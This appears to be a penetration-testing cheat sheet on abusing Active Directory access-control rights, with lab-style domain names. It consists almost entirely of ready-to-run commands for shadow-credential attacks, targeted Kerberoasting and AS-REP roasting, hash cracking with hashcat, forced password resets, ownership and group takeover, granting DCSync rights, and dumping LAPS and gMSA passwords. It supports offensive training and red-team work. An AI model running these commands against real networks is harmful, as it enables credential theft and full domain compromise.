###### AD ACL ###### | https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces | https://github.com/CravateRouge/bloodyAD/wiki/User-Guide | https://www.thehacker.recipes/ad/movement/dacl/ | ***************** GenericWrite-User ***************** | You have multiple options here msDS-KeyCredentialLink ********************** | In this method we add a certificate on targeted user, and use it to login against certificate based protocols. | You can either use certipy to do the all exploitation chain, or bloodyAD to generate certificates .. code-block:: bash certipy shadow auto -username user@box.htb -p pass -account targeteduser -debug -scheme ldap .. code-block:: bash bloodyAD --host 'dc.box.htb' -d 'box.htb' -u 'user' -p 'pass' add shadowCredentials targeteduser python3 PKINITtools/gettgtpkinit.py -cert-pem generated_cert.pem -key-pem generated_priv.pem box.htb/targeteduser targeteduser.ccache | | If no TLS/PKINIT protocols are availables and you get errors like KDC_ERR_PADATA_TYPE_NOSUPP, you can try to use startTLS on unsecure LDAP 389 instead. .. code-block:: bash git clone https://github.com/AlmondOffSec/PassTheCert.git /opt/git/PassTheCert python3 /opt/git/PassTheCert/Python/passthecert.py -domain box.htb -dc-ip -port 389 -crt generated_cert.pem -key generated_priv.pem | Targeted Kerberoast ******************* | We can set a SPN on targeted user and perform usual Kerberoast attack. .. code-block:: bash # Add SPN bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '' -d 'BOX.HTB' -u 'USER' set object TARGETEDUSER servicePrincipalName -v 'what/ever' # bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '' -d 'VINTAGE.HTB' -u 'USER' get object TARGETEDUSER --attr servicePrincipalName # Ask TGS GetUserSPNs.py 'BOX.HTB'/'USER' -k -no-pass -dc-ip 'DC01.BOX.HTB' -dc-host 'DC01.BOX.HTB' -request-user TARGETEDUSER -outputfile /tmp/hashes.kerberoast # Remove SPN bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '' -d 'BOX.HTB' -u 'USER' set object TARGETEDUSER servicePrincipalName | You can also use targetedKerberoast tool that automate this process... | targetedKerberoast will add SPN for any vulnerable user, ask TGS and finally remove added SPN. .. code-block:: bash git clone https://github.com/ShutdownRepo/targetedKerberoast.git /opt/git/targetedKerberoast pip3 install -r /opt/git/targetedKerberoast/requirements.txt python3 /opt/git/targetedKerberoast/targetedKerberoast.py -v -d 'box.htb' -u 'user' -p 'pass' # If you get clock errors please sync with DC ntp # sudo rdate -n | | Then use hashcat to crack the hash (TGS) .. code-block:: bash hashcat -m 13100 /tmp/hash /usr/share/wordlists/rockyou.txt --potfile-path=/home/user/HASHCATPOT Targeted AS-REP *************** | Pretty close to targeted kerberoast method, | we set the DONT_REQ_PREAUTH property on targeted user to perform targeted AS-REP Roasting .. code-block:: bash bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '' -d 'BOX.HTB' -u 'COMPROMISEDACCOUNT' add uac TARGETEDACCOUNT -f DONT_REQ_PREAUTH [-] ['DONT_REQ_PREAUTH'] property flags added to TARGETEDACCOUNT's userAccountControl GetNPUsers.py 'BOX.HTB'/'COMPROMISEDACCOUNT' -k -no-pass -dc-ip 'DC01.BOX.HTB' -dc-host 'DC01.BOX.HTB' -usersfile <(echo -e 'TARGETEDACCOUNT') -outputfile /tmp/hashes.asreproast -format hashcat $krb5asrep$23$TARGETEDACCOUNT@BOX.HTB:xxxxxxxxxxxxxx hashcat -m 18200 -a 0 hashes.asreproast /usr/share/wordlists/rockyou.txt --potfile-path=HASHCATPOT | Enable user *********** | That not an attack, but you can enable disabled account .. code-block:: bash bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '' -d 'BOX.HTB' -u 'USER' remove uac TARGETEDUSER -f ACCOUNTDISABLE [-] ['ACCOUNTDISABLE'] property flags removed from TARGETEDUSER's userAccountControl | *************** GenericAll-User *************** | (GenericAll contains GenericWrite) Set Password ************ | If you have GenericAll access against an user, you can set the user's password. | (You probably want to try GenericWrite methods first to retrieve the user's hash before losing it) .. code-block:: powershell net user robert FNUEOFNSIDsilfelifsef_1 /domain | | From linux .. code-block:: bash # With password bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set password VICTIM Pototo_123 # With NT HASH bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p ':NTHASH' set password VICTIM Pototo_123 | *************** WriteOwner-User *************** | You can set VICTIM's owner to USER, | then you grants USERS rights on VICTIM. .. code-block:: bash bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set owner VICTIM USER bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add genericAll VICTIM USER #bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set password VICTIM Pototo_123 | **************** WriteOwner-Group **************** | Change owner of group .. code-block:: bash bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set owner 'TheSuperAdminGroup' 'USER' | *********** Owner-Group *********** | Grant genericAll right to TheSuperAdminGroup for USER .. code-block:: bash bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add genericAll 'TheSuperAdminGroup' 'USER' | **************** GenericAll-Group **************** | Add USER to group .. code-block:: bash bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add groupMember 'TheSuperAdminGroup' 'USER' | **************** ReadLAPSPassword **************** .. code-block:: bash nxc ldap 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' --module laps | ********* WriteDacl ********* | You can add any ACL you want, like DCSync .. code-block:: bash bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' setDCSync USER | **************** ReadGMSAPassword **************** | You can retrieve gMSA account's NT hash .. code-block:: bash bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '' -d 'BOX.HTB' -u 'USER' -p 'PASS' get object 'GMSA01$' --attr msDS-ManagedPassword nxc ldap BOX.HTB -u 'USER' -p 'PASS' --gmsa | ******** WriteSPN ******** | You can perform Targeted Kerberoast